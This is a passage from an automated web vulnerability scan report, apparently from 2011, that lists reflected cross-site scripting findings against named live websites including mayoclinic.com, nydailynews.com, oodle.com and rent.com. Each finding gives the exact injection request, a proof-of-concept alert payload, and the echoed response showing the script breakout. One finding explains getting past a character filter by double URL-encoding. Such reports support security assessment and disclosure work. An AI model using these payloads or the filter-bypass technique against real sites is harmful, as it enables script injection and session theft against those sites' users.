The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0c3e%2527%253balert%25281%2529%252f%252f0eb65c39a2 was submitted in the REST URL parameter 1. This input was echoed as e0c3e';alert(1)//0eb65c39a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /favicon.icoe0c3e%2527%253balert%25281%2529%252f%252f0eb65c39a2 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mayoclinic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 file not found
Connection: close
Date: Sat, 02 Apr 2011 13:26:15 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: CFID=6783630;domain=.mayoclinic.com;expires=Mon, 25-Mar-2041 13:26:15 GMT;path=/
Set-Cookie: CFTOKEN=43948287;domain=.mayoclinic.com;expires=Mon, 25-Mar-2041 13:26:15 GMT;path=/
Set-Cookie: JSESSIONID=c230d0ddc76e41291cab3c2c7e2138772567;path=/
Set-Cookie: CURRENTFARCRYPROJECT=dotcom;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>

   <title>Page not found - MayoClinic.com</title>
   <meta name="description" conten
...[SNIP]...
';
   OAS_listpos = 'Bottom,Position4';
   OAS_query = 'E1ED5C92-F149-7785-66979D84200611F0=ObjectID&E1ED5C92-F149-7785-66979D84200611F0=pl&mcPage=type&404=ID&1?404;http://www.mayoclinic.com:80/favicon.icoe0c3e';alert(1)//0eb65c39a2=B404';
   OAS_target = '_top';
   //end of configuration
   OAS_version = 10;
   OAS_rn = '001234567890'; OAS_rns = '1234567890';
   OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
   fun
...[SNIP]...

6.66. http://www.mayoclinic.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mayoclinic.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4174f'%3balert(1)//b235c779868 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4174f';alert(1)//b235c779868 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?4174f'%3balert(1)//b235c779868=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mayoclinic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 file not found
Connection: close
Date: Sat, 02 Apr 2011 13:25:41 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: CFID=56390739;domain=.mayoclinic.com;expires=Mon, 25-Mar-2041 13:25:41 GMT;path=/
Set-Cookie: CFTOKEN=78178525;domain=.mayoclinic.com;expires=Mon, 25-Mar-2041 13:25:41 GMT;path=/
Set-Cookie: JSESSIONID=8030c0b06e9348c9e386246d2c3415127262;path=/
Set-Cookie: CURRENTFARCRYPROJECT=dotcom;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>

   <title>Page not found - MayoClinic.com</title>
   <meta name="description" conten
...[SNIP]...
;
   OAS_listpos = 'Bottom,Position4';
   OAS_query = 'E1ED5C92-F149-7785-66979D84200611F0=ObjectID&E1ED5C92-F149-7785-66979D84200611F0=pl&mcPage=type&404=ID&1?404;http://www.mayoclinic.com:80/favicon.ico?4174f';alert(1)//b235c779868=1=B404';
   OAS_target = '_top';
   //end of configuration
   OAS_version = 10;
   OAS_rn = '001234567890'; OAS_rns = '1234567890';
   OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
   f
...[SNIP]...

6.67. http://www.mayoclinic.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mayoclinic.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 506b0"-alert(1)-"3c6201fb7ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?506b0"-alert(1)-"3c6201fb7ef=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mayoclinic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 file not found
Connection: close
Date: Sat, 02 Apr 2011 13:25:40 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: CFID=21707428;domain=.mayoclinic.com;expires=Mon, 25-Mar-2041 13:25:40 GMT;path=/
Set-Cookie: CFTOKEN=48294501;domain=.mayoclinic.com;expires=Mon, 25-Mar-2041 13:25:40 GMT;path=/
Set-Cookie: JSESSIONID=f4308d3d1a40fd31ab3b9122d75b4ba1b687;path=/
Set-Cookie: CURRENTFARCRYPROJECT=dotcom;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>

   <title>Page not found - MayoClinic.com</title>
   <meta name="description" conten
...[SNIP]...
<script>
COMSCORE.beacon({
c1:2,
c2:"6035818",
c3:"6035818",
c4:"http://www.mayoclinic.com/invoke.cfm?b404=1?404;http://www.mayoclinic.com:80/favicon.ico?506b0"-alert(1)-"3c6201fb7ef=1",
c5:"",
c6:"",
c15:""
});
</script>
...[SNIP]...

6.68. http://www.mediaite.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mediaite.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f883"><script>alert(1)</script>a6bf2b66203 was submitted in the REST URL parameter 1. This input was echoed as 3f883\"><script>alert(1)</script>a6bf2b66203 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico3f883"><script>alert(1)</script>a6bf2b66203 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mediaite.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:18:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Cookie
Set-Cookie: PHPSESSID=3qrq02pgj5elgfbk68038olr35; path=/
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.mediaite.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 14:18:51 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34022

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="ht
...[SNIP]...
<form method="post" action="http://www.mediaite.com/favicon.ico3f883\"><script>alert(1)</script>a6bf2b66203/?_login=25c119c94d">
...[SNIP]...

6.69. http://www.motime.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.motime.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6b98"><script>alert(1)</script>c2b107df494 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icob6b98"><script>alert(1)</script>c2b107df494 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.motime.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.63
Date: Sat, 02 Apr 2011 13:58:08 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.12-pl0-gentoo
Edge-control: bypass-cache=on
Set-Cookie: trkdada=x3UsGU2XK3CFuGIzAy+8Ag==; expires=Sun, 01-Apr-12 13:58:08 GMT; path=/
P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"
Content-Length: 34371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="returnurl" value="/favicon.icob6b98"><script>alert(1)</script>c2b107df494" />
...[SNIP]...

6.70. http://www.motime.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.motime.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34891</script><script>alert(1)</script>e1ff6838de9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico34891</script><script>alert(1)</script>e1ff6838de9 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.motime.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.63
Date: Sat, 02 Apr 2011 13:58:22 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.12-pl0-gentoo
Edge-control: bypass-cache=on
Set-Cookie: trkdada=x3UsK02XK35zo0P8Azz5Ag==; expires=Sun, 01-Apr-12 13:58:22 GMT; path=/
P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"
Content-Length: 34334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<script type="text/javascript">
_dadanet.registerStartup(
['classes/FormManager', 'classes/CommObjects'],
function()
{
var co_opts = {


uri: 'http://www.motime.com/favicon.ico34891</script><script>alert(1)</script>e1ff6838de9',
dict:{
'op_in_progress_desc': '',
'is_friend': 'We are friends',
'invite_already_send': 'Invite already sent',
'invite_send': 'Invitation sent',
'invite_blocked': 'Invites blocked by user',
'is_fan'
...[SNIP]...

6.71. http://www.mp3raid.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mp3raid.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cb45a<script>alert(1)</script>f364086cc64 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icocb45a<script>alert(1)</script>f364086cc64 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mp3raid.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:07:05 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.1
X-Powered-By: PHP/5.3.1
Content-Length: 5934
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><TITLE>404 Page Not Fou
...[SNIP]...
<h1>The page /favicon.icocb45a<script>alert(1)</script>f364086cc64 not found!</h1>
...[SNIP]...

6.72. http://www.mp3raid.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mp3raid.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcd99"><script>alert(1)</script>c02e519161c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icodcd99"><script>alert(1)</script>c02e519161c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mp3raid.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:07:05 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.1
X-Powered-By: PHP/5.3.1
Content-Length: 5940
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><TITLE>404 Page Not Fou
...[SNIP]...
<a href="http://www.addthis.com/bookmark.php?v=250&pub=burkul" onmouseover="return addthis_open(this, '', 'http://www.mp3raid.com/favicon.icodcd99"><script>alert(1)</script>c02e519161c', '404 Page Not Found')" onmouseout="addthis_close()" onclick="return addthis_sendto()">
...[SNIP]...

6.73. http://www.mycricket.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycricket.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8634e</script><script>alert(1)</script>11bc3873d9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico8634e</script><script>alert(1)</script>11bc3873d9a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mycricket.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:42:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.14-pl0-gentoo
Set-Cookie: mycricket_rdi=ee713ae5dfb322af6abdeece0ada1b4e; path=/
Content-Type: text/html; charset=utf-8
Content-Length: 30848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
    <title>invalid page | Cricke
...[SNIP]...
pe="text/javascript">
var hbx=new Object();hbx.vpc="HBX0150.02e";hbx.gn="ehg-reddoor.hitbox.com";

//BEGIN EDITABLE SECTION
//CONFIGURATION VARIABLES
hbx.acct="DM560614E2RE94EN3";
hbx.mlc="/favicon.ico8634e</script><script>alert(1)</script>11bc3873d9a"; //multi-level content category

//alert('tmpl: hbx_page_code_for_error_pages');

try{
eval ('data = ' + $.cookie('data'));
var hbxCommerceVars={};
hbxCommerceVars.pv="0"; //product
...[SNIP]...

6.74. http://www.mylifetime.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mylifetime.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 255ec'%3b8d549cf0020 was submitted in the REST URL parameter 1. This input was echoed as 255ec';8d549cf0020 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /255ec'%3b8d549cf0020 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mylifetime.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sat, 02 Apr 2011 13:36:40 GMT
X-Pingback: http://www.mylifetime.com/xmlrpc.php
X-Lt-Cache: CACHE_PAGE_set
X-Lt-Cache-key: http://www.mylifetime.com/255ec'%3b8d549cf0020
RealServer: prodweb4
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 02 Apr 2011 13:36:42 GMT
Date: Sat, 02 Apr 2011 13:36:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 70219

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<script type="text/javascript">refresh_rate = 1;
hbx_ad_refresh_page = 'index';
hbx_ad_refresh_apath = '_255ec';8d549cf0020';</script>
...[SNIP]...

6.75. http://www.mylifetime.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mylifetime.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 175d9"><a>3ddeb7ae6ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /175d9"><a>3ddeb7ae6ca HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mylifetime.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sat, 02 Apr 2011 13:35:32 GMT
X-Pingback: http://www.mylifetime.com/xmlrpc.php
X-Lt-Cache: CACHE_PAGE_set
X-Lt-Cache-key: http://www.mylifetime.com/175d9"><a>3ddeb7ae6ca
Realserver: prodweb12
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 02 Apr 2011 13:35:35 GMT
Date: Sat, 02 Apr 2011 13:35:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 70249

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<img src="http://pixel.quantserve.com/pixel/p-84eTroxoNX3JE.gif?labels=MYLT:175d9"><a>3ddeb7ae6ca" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
...[SNIP]...

6.76. http://www.nydailynews.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3df4'%3balert(1)//2457915afd7 was submitted in the REST URL parameter 1. This input was echoed as c3df4';alert(1)//2457915afd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoc3df4'%3balert(1)//2457915afd7 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nydailynews.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:24:42 GMT
Server: Apache
Keep-Alive: timeout=3, max=998
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 71163
Set-Cookie: sto-id-sg-web-8080=BOACAKAK; Expires=Sat, 02-Apr-2011 02:24:23 GMT; Path=/

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/favicon.icoc3df4';alert(1)//2457915afd7';
}
//-->
...[SNIP]...

6.77. http://www.oodle.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dee3e"-alert(1)-"d0aa2d773ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icodee3e"-alert(1)-"d0aa2d773ae HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.oodle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 13:36:48 GMT
Content-Length: 23641
Connection: close
Set-Cookie: otu=f0124679080472be32101e034bba68c0; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: ots=c3f05fa9a6a425c696068891ef99e4ef; path=/; domain=.oodle.com
Set-Cookie: a=dT1EMkY4MTExRTREOTcyNjcw; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
-_--_--_-";
odl.reporting.replyExtraFields = "usa-_-nonclassifieds-_-nonclassifieds-_--_-www-_-USA-_-oodle-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds favicon.icodee3e"-alert(1)-"d0aa2d773ae","10000000","usa-_-nonclassifieds-_-nonclassifieds-_-www USA-_-www-_-USA-_-oodle-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

6.78. http://www.oodle.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 141c5"><script>alert(1)</script>d6b037b25fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico141c5"><script>alert(1)</script>d6b037b25fc HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.oodle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 13:36:47 GMT
Content-Length: 23718
Connection: close
Set-Cookie: otu=4d4e452f05e3458af8c7091581577bcf; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: ots=f396da894437be11c53e9aafdb5d3381; path=/; domain=.oodle.com
Set-Cookie: a=dT1BNUUwMDhCMDREOTcyNjZG; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/favicon.ico141c5"><script>alert(1)</script>d6b037b25fc" />
...[SNIP]...

6.79. http://www.pronto.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pronto.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c04d7'><script>alert(1)</script>f4fdd867ae0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoc04d7'><script>alert(1)</script>f4fdd867ae0 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pronto.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:24:39 GMT
Server: Apache/2.2.4 (Fedora)
Content-Type: text/html;charset=ISO-8859-1
Via: CN-5000
Proxy-Connection: Keep-Alive
Content-Length: 90396


            <!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"

...[SNIP]...
<meta content='http://www.pronto.com/favicon.icoc04d7'><script>alert(1)</script>f4fdd867ae0' property='og:url'/>
...[SNIP]...

6.80. http://www.rent.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rent.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee0cd'%3bcb0a88443c6 was submitted in the REST URL parameter 1. This input was echoed as ee0cd';cb0a88443c6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.icoee0cd'%3bcb0a88443c6 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rent.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:36:01 GMT
Server: Apache
Set-Cookie: session=8bd0d740a1e3f55aa6029029f1babb60/1301751361/05455137116852e2aca9e684d063385b; domain=.rent.com; path=/
Set-Cookie: RD=; path=/; expires=Sat, 02-Apr-2011 13:36:31 GMT
Cache-Control: must-revalidate
Expires: Sat, 02 Apr 2011 13:36:02 GMT
Last-Modified: Sat, 02 Apr 2011 13:36:01 GMT
Set-Cookie: browser=1.210801301751361255; path=/; expires=Tue, 30-Mar-21 13:36:01 GMT; domain=.rent.com
P3P: CP='ALL DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONo OUR IND PHY ONL UNI COM NAV INT STA'
Content-Type: text/html; charset=utf-8
X-Cache: MISS from www.rent.com
Content-Length: 20031


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en" class="no-js">
<head>
<title>Error 404: Page Not Found</title>

<link href="http://media.rent.com/css/renter.css?v=8297
...[SNIP]...
<script type="text/javascript">
$().ready(function() {
next_url = '/favicon.icoee0cd';cb0a88443c6';
ajax_img = 'http://media.rent.com/img/global/ajax-loader-blue.gif';
signin_box_state = 'closed';

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>
...[SNIP]...

6.81. http://www.rent.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rent.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5a25%2522%253e%253ca%2520b%253dc%253e1df3e30028f was submitted in the REST URL parameter 1. This input was echoed as f5a25"><a b=c>1df3e30028f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

